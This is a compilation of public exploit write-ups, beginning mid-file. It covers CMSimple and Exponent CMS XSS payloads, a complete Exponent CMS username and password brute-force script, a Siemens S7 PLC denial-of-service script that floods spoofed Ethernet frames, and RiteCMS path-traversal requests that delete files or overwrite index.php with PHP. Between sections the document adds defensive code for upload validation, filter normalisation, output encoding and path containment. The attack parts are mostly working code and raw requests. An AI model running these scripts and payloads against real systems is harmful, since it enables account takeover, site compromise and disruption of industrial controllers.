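# Assumed allowlist for this example; the projects' real lists are not on the page.
ALLOWED_EXT = {"png", "jpg", "jpeg", "gif", "txt", "pdf"}
# RFC 2045 type/subtype tokens only; parameters are stripped before matching.
MEDIA_TYPE_RE = re.compile(r"^[A-Za-z0-9!#$&^_.+-]+/[A-Za-z0-9!#$&^_.+-]+$")


@dataclass
class Part:
    name: str
    filename: Optional[str]
    content_type: Optional[str]
    data: bytes


def parse_multipart(body: bytes, boundary: str) -> List[Part]:
    """Minimal multipart/form-data parser: flat parts, CRLF line endings, no nesting."""
    parts = []
    for chunk in body.split(b"--" + boundary.encode())[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            key, _, value = line.partition(":")
            headers[key.strip().lower()] = value.strip()
        disp = headers.get("content-disposition", "")
        name = re.search(r'(?<![A-Za-z])name="([^"]*)"', disp)
        fname = re.search(r'filename="([^"]*)"', disp)
        parts.append(Part(name.group(1) if name else "",
                          fname.group(1) if fname else None,
                          headers.get("content-type"),
                          data[:-2] if data.endswith(b"\r\n") else data))
    return parts


def safe_extension(filename: str) -> Optional[str]:
    """Allowlisted final extension, or None. Any directory part the client sent is dropped."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or ext.lower() not in ALLOWED_EXT:
        return None
    # shell.php.png and similar: every inner "extension" must be allowlisted too
    if any(p.lower() not in ALLOWED_EXT for p in stem.split(".")[1:]):
        return None
    return ext.lower()


def validate_upload(part: Part) -> dict:
    """Gate a file part. Neither the filename nor the Content-Type is trusted."""
    if part.filename is None:
        return {"ok": False, "reason": "not a file part"}
    ext = safe_extension(part.filename)
    if ext is None:
        return {"ok": False, "reason": "extension not allowed"}
    media_type = (part.content_type or "").split(";")[0].strip()
    if not MEDIA_TYPE_RE.match(media_type):
        # Reject instead of storing: a stored, later-echoed value is the first Croogo finding.
        return {"ok": False, "reason": "malformed Content-Type"}
    if part.data.lstrip().startswith(b"<?"):      # defence in depth; the allowlist is the real gate
        return {"ok": False, "reason": "PHP source in upload"}
    # Server-chosen name: the client's filename never reaches the filesystem.
    return {"ok": True, "stored_as": f"{secrets.token_hex(8)}.{ext}"}


def validate_rename(old_name: str, new_name: str) -> bool:
    """A rename must pass the same allowlist, or evil.png -> evil.php reopens the upload hole."""
    return safe_extension(old_name) is not None and safe_extension(new_name) is not None


# Constructed body in the shape of the page's captures (not the page's exact bytes).
BOUNDARY = "----example"
SAMPLE = (
    b'------example\r\nContent-Disposition: form-data; name="_method"\r\n\r\nPOST\r\n'
    b'------example\r\nContent-Disposition: form-data; name="file"; filename="file.txt"\r\n'
    b'Content-Type: <script>alert(document.cookie)</script>\r\n\r\nhello\r\n'
    b'------example\r\nContent-Disposition: form-data; name="setting-43"; filename="malicious.php"\r\n'
    b'Content-Type: application/octet-stream\r\n\r\n<?php echo 1; ?>\r\n'
    b'------example\r\nContent-Disposition: form-data; name="pic"; filename="photo.png"\r\n'
    b'Content-Type: image/png\r\n\r\n\x89PNG\r\n'
    b'------example--\r\n'
)


def check_sample() -> List[dict]:
    return [validate_upload(p) for p in parse_multipart(SAMPLE, BOUNDARY)]


if __name__ == "__main__":
    for part, verdict in zip(parse_multipart(SAMPLE, BOUNDARY), check_sample()):
        print(part.name, part.filename, verdict)
    print("rename evil.png -> evil.php allowed:", validate_rename("evil.png", "evil.php"))
```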
-
CMSimple 5.4 - Cross Site Scripting (XSS)
# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os

[Description]
Since the application filters user input with preg_replace, an attacker can bypass the restriction by encoding the payload as HTML numeric character references (the "HTML to Unicode" encoding produced by the script below). This lets the attacker perform DOM-based XSS.

[Payload and POC]
File > images > Upload a file

Attack vector >> ')-alert(1)//
(need to encode) >> &#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;

When the victim clicks the delete button, an alert will be executed.

Script to encode the payload

```python
payload = input()
finalpayload = ""
for i in payload:
    finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)
```
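What defeats the preg_replace filter above is the order of operations: the pattern runs over the raw input, but the browser decodes the `&#NN;` references before the value reaches the DOM. This added example (not CMSimple's code; the blocklist pattern and the onclick sink are assumptions standing in for the real filter and the delete button the page describes) shows the encoded payload slipping past a pattern that catches the plain one, and the two defences that hold: normalising character references before any check, and encoding on output for the exact context the value is written into.

```python
import html
import json
import re

# Stand-in for a preg_replace-style blocklist; CMSimple's real pattern is not on the page.
BLOCKLIST = re.compile(r"alert\s*\(|<\s*script|javascript:", re.IGNORECASE)
PAYLOAD = "')-alert(1)//"          # the page's attack vector


def encode_numeric(text: str) -> str:
    """The page's encoder: every character becomes a decimal character reference (&#NN;)."""
    return "".join(f"&#{ord(c)};" for c in text)


def filter_raw(value: str) -> str:
    """The weak filter: the pattern runs over the input exactly as submitted."""
    return BLOCKLIST.sub("", value)


def filter_normalised(value: str) -> str:
    """Decode character references until stable (catches double encoding), then filter."""
    previous = None
    while previous != value:
        previous, value = value, html.unescape(value)
    return BLOCKLIST.sub("", value)


def browser_sees(stored: str) -> str:
    """What the HTML parser hands to the DOM: references in the stored text are decoded."""
    return html.unescape(stored)


def render_delete_link(filename: str) -> str:
    """Output encoding for the assumed sink: the filename inside a JS string inside an
    onclick attribute. Encode inside-out: JS string literal first, then HTML attribute."""
    js_literal = json.dumps(filename)
    return f'<a href="#" onclick="deleteFile({html.escape(js_literal, quote=True)})">delete</a>'


if __name__ == "__main__":
    encoded = encode_numeric(PAYLOAD)
    print("raw filtered       :", filter_raw(PAYLOAD))
    print("encoded, raw filter:", filter_raw(encoded))
    print("DOM then holds     :", browser_sees(filter_raw(encoded)))
    print("normalised filter  :", filter_normalised(encoded))
    print("encoded on output  :", render_delete_link(PAYLOAD))
```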
-
Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities
# Exploit Author: heinjame
# Date: 22/10/2021
# Exploit Author: picaro_o
# Vendor Homepage: https://www.exponentcms.org/
# Version: <=2.6
# Tested on: Linux os

*Stored XSS*

Affected parameter => http://127.0.0.1:8082/expcms/text/edit/id/{id}/src/@footer (Title, Text Block)
Payload = <iframe/src="data:text/html,<svg onload=alert(1)>">

*Database credentials are disclosed in response*

POC
```
var adminerwindow = function (){
    var win = window.open('/expcms/external/adminer/admin.php?server=localhost&username=root&db=exponentcms');
    if (!win) {
        err();
    }
}
```

*Authentication Bruteforce*
```python
import argparse
import requests
import sys

parser = argparse.ArgumentParser()
parser.add_argument("url", help="URL")
parser.add_argument("Username list", help="Username List")
parser.add_argument("Password list", help="Password List")
pargs = parser.parse_args()
host = sys.argv[1]
userlist = sys.argv[2]
passlist = sys.argv[3]

try:
    readuser = open(userlist)
    readpass = open(passlist)
except:
    print("Unable to load files")
    exit()


def usernamebrute():
    s = requests.Session()
    adminaccount = None   # initialised so the "not found" path returns cleanly
    checkpoint = False
    for username in readuser.readlines():
        brute = {
            'controller': (None, 'users'),
            'src': (None, ''),
            'int': (None, ''),
            'action': (None, 'send_new_password'),
            'username': (None, username.strip()),
        }
        bruteforce = s.post(host + "/index.php", files=brute)
        status = s.get(host + "/users/reset_password")
        if "administrator" in status.text:
            print("[+] Found username : " + username)
            adminaccount = username
            checkpoint = True
            break
    return adminaccount, checkpoint


def passwordbrute(adminaccount):
    s = requests.Session()
    s.cookies.set("csrftoken", "abc")
    header = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
        'Accept-Language': 'en-US,en;q=0.5',
        'Accept-Encoding': 'gzip, deflate',
        'COntent-TYpE': 'applicatiOn/x-WWW-fOrm-urlencoded1',
        'Referer': host + '/login/showlogin'
    }
    for password in readpass.readlines():
        brute = {
            'controller': 'login',
            'src': '',
            'int': '',
            'action': 'login',
            'username': adminaccount,
            'password': password.strip()
        }
        bruteforce = s.post(host + "/index.php", headers=header, data=brute)
        # print(bruteforce.text)
        # the session already carries the csrftoken cookie set above
        status = s.get(host + "/login/showlogin")
        print(status.text)
        if "Invalid Username / Password" not in status.text:
            print("[+] Found Password : " + password)
            break


adminaccount, checkpoint = usernamebrute()
if checkpoint == True:
    passwordbrute(adminaccount)
else:
    print("Can't find username, we can't proceed sorry :(")
```
-
Siemens S7 Layer 2 - Denial of Service (DoS)
# Exploit Title: Siemens S7 Layer 2 - Denial of Service (DoS)
# Date: 21/10/2021
# Exploit Author: RoseSecurity
# Vendor Homepage: https://www.siemens.com/us/en.html
# Version: Firmware versions >= 3
# Tested on: Siemens S7-300, S7-400 PLCs

```python
#!/usr/bin/python3
from scapy.all import *
from colorama import Fore, Back, Style
from subprocess import Popen, PIPE
from art import *
import threading
import subprocess
import time
import os
import sys
import re

# Banner (figlet-style art reading "AUTOMATOR TERMINATOR"; column alignment was lost when the post was flattened)
print(Fore.RED + r"""
▄▄▄· ▄• ▄▌▄▄▄▄▄ • ▌ ▄ ·. ▄▄▄· ▄▄▄▄▄ ▄▄▄
▐█ ▀█ █▪██▌•██ ▪ ·██ ▐███▪▐█ ▀█ •██ ▪ ▀▄ █·
▄█▀▀█ █▌▐█▌ ▐█.▪ ▄█▀▄ ▐█ ▌▐▌▐█·▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
▐█ ▪▐▌▐█▄█▌ ▐█▌·▐█▌.▐▌██ ██▌▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
▀ ▀ ▀▀▀ ▀▀▀ ▀█▄▀▪▀▀ █▪▀▀▀ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
▄▄▄▄▄▄▄▄ .▄▄▄ • ▌ ▄ ·. ▪ ▐ ▄ ▄▄▄· ▄▄▄▄▄ ▄▄▄
•██ ▀▄.▀·▀▄ █··██ ▐███▪██ •█▌▐█▐█ ▀█ •██ ▪ ▀▄ █·
▐█.▪▐▀▀▪▄▐▀▀▄ ▐█ ▌▐▌▐█·▐█·▐█▐▐▌▄█▀▀█ ▐█.▪ ▄█▀▄ ▐▀▀▄
▐█▌·▐█▄▄▌▐█•█▌██ ██▌▐█▌▐█▌██▐█▌▐█ ▪▐▌ ▐█▌·▐█▌.▐▌▐█•█▌
▀▀▀ ▀▀▀ .▀ ▀▀▀ █▪▀▀▀▀▀▀▀▀ █▪ ▀ ▀ ▀▀▀ ▀█▄▀▪.▀ ▀
""")
time.sleep(1.5)

# Get IP to exploit
IP = input("Enter the IP address of the device to exploit: ")

# Find the mac address of the device
Mac = getmacbyip(IP)


# Function to send the output to "nothing"
def NULL():
    f = open(os.devnull, 'w')
    sys.stdout = f


# Eternal loop to produce DoS condition
def Arnold():
    AutomatorTerminator = True
    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()


def Sarah():
    AutomatorTerminator = True
    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()


def Kyle():
    AutomatorTerminator = True
    while AutomatorTerminator == True:
        Packet = Ether()
        Packet.dst = "00:00:00:00:00:00"
        Packet.src = Mac
        sendp(Packet)
        NULL()


# Arnold
ArnoldThread = threading.Thread(target=Arnold)
ArnoldThread.start()
ArnoldThread.join()
NULL()

# Sarah
SarahThread = threading.Thread(target=Sarah)
SarahThread.start()
SarahThread.join()
NULL()

# Kyle
KyleThread = threading.Thread(target=Kyle)
KyleThread.start()
KyleThread.join()
NULL()
```
-
RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Deletion (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/5514b3eaf0a108e27f45657955e539fd

################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file deletion vulnerability in the Admin Panel. Exploiting the vulnerability allows an authenticated attacker to delete any file in the web root (along with any other file on the server that the PHP process user has permission to delete). Furthermore, an attacker might leverage arbitrary file deletion to circumvent certain web server security mechanisms, for example by deleting the .htaccess file that enforces them.

#####################################################
# PoC to delete secretConfig.conf file in web root  #
#####################################################

Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Delete any file
4. Intercept the request and replace the current file name with any file on the server via the "delete" parameter.

# Assumed there is a secretConfig.conf file in web root

PoC:
param delete - Deleting secretConfig.conf file in web root, so the payload will be "../secretConfig.conf"

Request:
========

GET /ritecms.v3.1.0/admin.php?mode=filemanager&directory=media&delete=../secretConfig.conf&confirmed=true HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/ritecms.v3.1.0/admin.php?mode=filemanager
Cookie: PHPSESSID=vs8iq0oekpi8tip402mk548t84
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Sec-GPC: 1
-
RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Exploit Title: RiteCMS 3.1.0 - Arbitrary File Overwrite (Authenticated)
# Date: 25/07/2021
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://ritecms.com/
# Software Link: https://github.com/handylulu/RiteCMS/releases/download/V3.1.0/ritecms.v3.1.0.zip
# Version: <= 3.1.0
# Google Dork: intext:"Powered by RiteCMS"
# Tested on: Windows 10, Ubuntu 18, XAMPP
# Reference: https://gist.github.com/faisalfs10x/4a3b76f666ff4c0443e104c3baefb91b

################
# Description  #
################

# RiteCMS version 3.1.0 and below suffers from an arbitrary file overwrite vulnerability in the Admin Panel. Exploiting the vulnerability allows an authenticated attacker to overwrite any file in the web root (along with any other file on the server that the PHP process user has permission to write). Furthermore, an attacker might leverage arbitrary file overwrite to modify existing files such as /etc/passwd or /etc/shadow if the PHP process user runs as root.

############################################################
# PoC to overwrite existing index.php to display phpinfo() #
############################################################

Steps to Reproduce:
1. Login as admin
2. Go to File Manager
3. Then, click Upload file > Browse..
4. Upload any file and tick the checkbox named "overwrite file with same name"
5. Intercept the request and replace the current file name with any file path on the server via the "file_name" parameter.

PoC:
param file_name - to overwrite index.php to display phpinfo, so the payload will be "../index.php"
param filename - with the content of "<?php phpinfo(); ?>"

Request:
========

POST /ritecmsv3.1.0/admin.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------351719865731412638493510448298
Content-Length: 1840
Origin: http://localhost
DNT: 1
Connection: close
Referer: http://192.168.8.143/ritecmsv3.1.0/admin.php?mode=filemanager&action=upload&directory=media
Cookie: PHPSESSID=nuevl0lgkrc3dv44g3vgkoqqre
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="mode"

filemanager
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file"; filename="anyfile.txt"
Content-Type: application/octet-stream

content of the file to overwrite here
-- this is example to overwrite index.php to display phpinfo --
<?php phpinfo(); ?>
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="directory"

media
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="file_name"

../index.php
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="overwrite_file"

true
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_mode"

1
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="resize"

640
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="compression"

80
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize_xy"

x
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_resize"

150
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="thumbnail_compression"

70
-----------------------------351719865731412638493510448298
Content-Disposition: form-data; name="upload_file_submit"

OK - Upload file
-----------------------------351719865731412638493510448298--
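Both RiteCMS issues come down to one missing check: the `delete` and `file_name` values are joined onto the media directory without confirming that the result still lies inside it. The added example below (not RiteCMS's code; the web root with index.php, secretConfig.conf and a media/ directory is constructed in a temporary directory) resolves the requested name against the managed directory and refuses anything that escapes it, including the page's `../secretConfig.conf` and `../index.php`.

```python
import tempfile
from pathlib import Path


class PathEscape(ValueError):
    """Raised when a client-supplied name resolves outside the managed directory."""


def resolve_inside(base: Path, user_name: str) -> Path:
    """Join a client-supplied name onto base and prove the result is still under base.

    resolve() collapses '..' segments and follows symlinks, so the containment
    test is made on the real path, not on the string the client sent."""
    if not user_name or "\x00" in user_name:
        raise PathEscape("empty name or NUL byte")
    base = base.resolve()
    candidate = (base / user_name).resolve()   # an absolute user_name replaces base entirely
    if candidate == base or base not in candidate.parents:
        raise PathEscape(f"{user_name!r} resolves to {candidate}, outside {base}")
    return candidate


def delete_managed(base: Path, name: str) -> bool:
    """File-manager delete with containment enforced. Returns False if the file is absent."""
    target = resolve_inside(base, name)
    if not target.is_file():
        return False
    target.unlink()
    return True


def write_managed(base: Path, name: str, content: bytes, overwrite: bool) -> Path:
    """File-manager upload with containment enforced; overwrite only when explicitly allowed."""
    target = resolve_inside(base, name)
    if target.exists() and not overwrite:
        raise FileExistsError(str(target))
    target.write_bytes(content)
    return target


def demo() -> dict:
    """Constructed web root: index.php and secretConfig.conf beside a media/ upload directory."""
    root = Path(tempfile.mkdtemp())
    media = root / "media"
    media.mkdir()
    (root / "index.php").write_text("<?php echo 'site'; ?>")
    (root / "secretConfig.conf").write_text("db_password=placeholder")
    (media / "photo.png").write_bytes(b"\x89PNG")

    outcome = {}
    for name in ("../secretConfig.conf", "photo.png"):          # the page's delete payload, then a legitimate one
        try:
            outcome["delete " + name] = delete_managed(media, name)
        except PathEscape:
            outcome["delete " + name] = "blocked"
    for name in ("../index.php", "new.txt"):                    # the page's overwrite payload, then a legitimate one
        try:
            write_managed(media, name, b"replacement content", overwrite=True)
            outcome["write " + name] = "written"
        except PathEscape:
            outcome["write " + name] = "blocked"
    outcome["index_intact"] = (root / "index.php").read_text().startswith("<?php echo 'site'")
    outcome["secret_intact"] = (root / "secretConfig.conf").exists()
    outcome["photo_gone"] = not (media / "photo.png").exists()
    return outcome


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:28} {value}")
```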